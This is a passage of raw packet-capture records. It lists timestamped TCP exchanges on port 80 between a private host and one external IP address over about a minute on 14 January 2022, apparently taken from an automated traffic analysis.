                    Jan 14, 2022 07:15:17.266415119 CET8049767104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:17.266628981 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.266683102 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.390873909 CET8049767104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.262489080 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.386570930 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.386708975 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.393620968 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.518122911 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.518191099 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.642317057 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.650015116 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.650059938 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.650125027 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.650209904 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.774828911 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:19.537019014 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:19.691287994 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:19.692826033 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:19.695573092 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:19.846610069 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:19.846723080 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:20.007998943 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:20.016736984 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:20.016784906 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:20.016962051 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:20.017034054 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:20.141881943 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.196603060 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.319559097 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.319654942 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.323362112 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.445976973 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.446059942 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.569977999 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.577928066 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.578051090 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.578094006 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.578141928 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.728550911 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.232184887 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.356343985 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.356417894 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.359164000 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.483490944 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.483581066 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.607997894 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.616121054 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.616225004 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.616311073 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.616329908 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.740901947 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:25.662341118 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:25.805389881 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:25.805676937 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:25.808697939 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:25.954987049 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:25.955164909 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:26.107965946 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:26.114744902 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:26.114762068 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:26.114911079 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:26.114974022 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:26.441430092 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.466988087 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.593509912 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.593699932 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.597120047 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.721062899 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.721211910 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.845391989 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.853188038 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.853257895 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.853420973 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.853492975 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.978502989 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:28.870106936 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:28.994477987 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:28.994577885 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:28.997591972 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:29.121929884 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:29.122049093 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:29.246237040 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:29.253197908 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:29.253262043 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:29.253360987 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:29.253465891 CET4977480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:29.378015995 CET8049774104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.323822021 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.446624994 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.446856976 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.454418898 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.577044010 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.577229977 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.699785948 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.710796118 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.710833073 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:30.710966110 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.711047888 CET4977580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:30.834295988 CET8049775104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:31.692822933 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:31.815315008 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:31.815468073 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:31.824330091 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:31.946660042 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:31.946741104 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:32.069384098 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:32.075763941 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:32.075810909 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:32.076026917 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:32.076072931 CET4977680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:32.198952913 CET8049776104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:32.974442005 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.097385883 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:33.097531080 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.100122929 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.222511053 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:33.222616911 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.345293999 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:33.355024099 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:33.355097055 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:33.355202913 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.355246067 CET4977780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:33.478617907 CET8049777104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.267332077 CET4977880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:35.391622066 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.391765118 CET4977880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:35.394366026 CET4977880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:35.519946098 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.520056009 CET4977880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:35.644304037 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.667382956 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.667426109 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:35.667565107 CET4977880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:35.791630030 CET8049778104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:37.655143976 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:37.777503967 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:37.777637959 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:37.781119108 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:37.903722048 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:37.903804064 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:38.026352882 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:38.033628941 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:38.033668041 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:38.033746958 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:38.034060955 CET4978180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:38.156929016 CET8049781104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.185220003 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.337157965 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.337266922 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.339952946 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.463884115 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.463958979 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.597522974 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.607796907 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.607841015 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:40.607896090 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.607927084 CET4978280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:40.734819889 CET8049782104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.084664106 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.207230091 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.207324028 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.210043907 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.332628012 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.332705021 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.455331087 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.464898109 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.464939117 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:43.465063095 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.465147972 CET4978380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:43.588347912 CET8049783104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.559092999 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:44.681673050 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.681782961 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:44.685173988 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:44.809073925 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.809154034 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:44.932276964 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.943876982 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.943921089 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:44.944129944 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:44.944184065 CET4978480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:45.069294930 CET8049784104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.152893066 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.276901960 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.277021885 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.279601097 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.403703928 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.403915882 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.528119087 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.535479069 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.535547972 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:46.535703897 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.535804033 CET4978580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:46.660327911 CET8049785104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.549921989 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:48.674393892 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.674551010 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:48.680702925 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:48.805067062 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.805205107 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:48.929606915 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.940790892 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.940834999 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:48.940923929 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:48.940970898 CET4978680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:49.066169024 CET8049786104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.153254986 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.275723934 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.275877953 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.278645992 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.496124983 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.496203899 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.711863995 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.711889029 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.711901903 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:51.711961031 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.712032080 CET4978780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:51.903575897 CET8049787104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:52.782591105 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:52.907073021 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:52.907212019 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:52.910922050 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:53.033756971 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:53.033909082 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:53.156723976 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:53.164037943 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:53.164153099 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:53.164268017 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:53.164318085 CET4978880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:53.300776958 CET8049788104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.256967068 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.381253958 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.381366968 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.384953022 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.510581970 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.510684967 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.634829044 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.642054081 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.642081022 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:54.642183065 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.642204046 CET4978980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:54.773616076 CET8049789104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.277034998 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.401386023 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.401492119 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.404035091 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.530777931 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.530853033 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.680429935 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.687561035 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.687607050 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:56.687753916 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.687803030 CET4979080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:56.812426090 CET8049790104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:58.745915890 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:58.870275021 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:58.870400906 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:58.873327017 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:58.997723103 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:58.997903109 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:59.122108936 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:59.129765034 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:59.129796028 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:59.129918098 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:59.129978895 CET4979180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:59.254667044 CET8049791104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:01.502743006 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:01.625967979 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:01.628447056 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:01.632257938 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:01.756519079 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:01.756613016 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:02.004942894 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:02.004981041 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:02.005002022 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:02.005055904 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:02.005124092 CET4979280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:02.147258043 CET8049792104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.149904013 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.272480965 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.272602081 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.275393009 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.397806883 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.397876978 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.520497084 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.527699947 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.527745962 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:03.527869940 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.527929068 CET4979380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:03.651561975 CET8049793104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.394910097 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.518780947 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.518870115 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.521631956 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.644134045 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.644192934 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.766757011 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.775456905 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.775523901 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:04.775590897 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.775629997 CET4979480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:04.898650885 CET8049794104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:05.796005011 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:05.918694973 CET8049795104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:05.918823957 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:05.921415091 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:06.043883085 CET8049795104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:06.043971062 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:06.167455912 CET8049795104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:06.174947023 CET8049795104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:06.174989939 CET8049795104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:06.175048113 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:06.175106049 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:06.297940969 CET8049795104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.176011086 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.325608015 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.325831890 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.332344055 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.455229998 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.455298901 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.582072020 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.593718052 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.593730927 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.593813896 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.593858957 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.717161894 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:08.699098110 CET4980480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:08.821787119 CET8049804104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:08.822550058 CET4980480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:08.825263977 CET4980480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:08.947782993 CET8049804104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:08.949115038 CET4980480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:09.073869944 CET8049804104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:09.082606077 CET8049804104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:09.082638979 CET8049804104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:09.084621906 CET4980480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:09.084691048 CET4980480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:09.207598925 CET8049804104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:11.949965954 CET4982380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:12.082779884 CET8049823104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:12.082976103 CET4982380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:12.085515976 CET4982380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:12.208225012 CET8049823104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:12.209481001 CET4982380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:12.331789970 CET8049823104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:12.347671986 CET8049823104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:12.347716093 CET8049823104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:12.347783089 CET4982380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:12.347815990 CET4982380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:12.517690897 CET8049823104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:14.022157907 CET4983380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:14.144762039 CET8049833104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:14.144870996 CET4983380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:14.147581100 CET4983380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:14.301414013 CET8049833104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:14.301525116 CET4983380192.168.2.4104.223.93.105
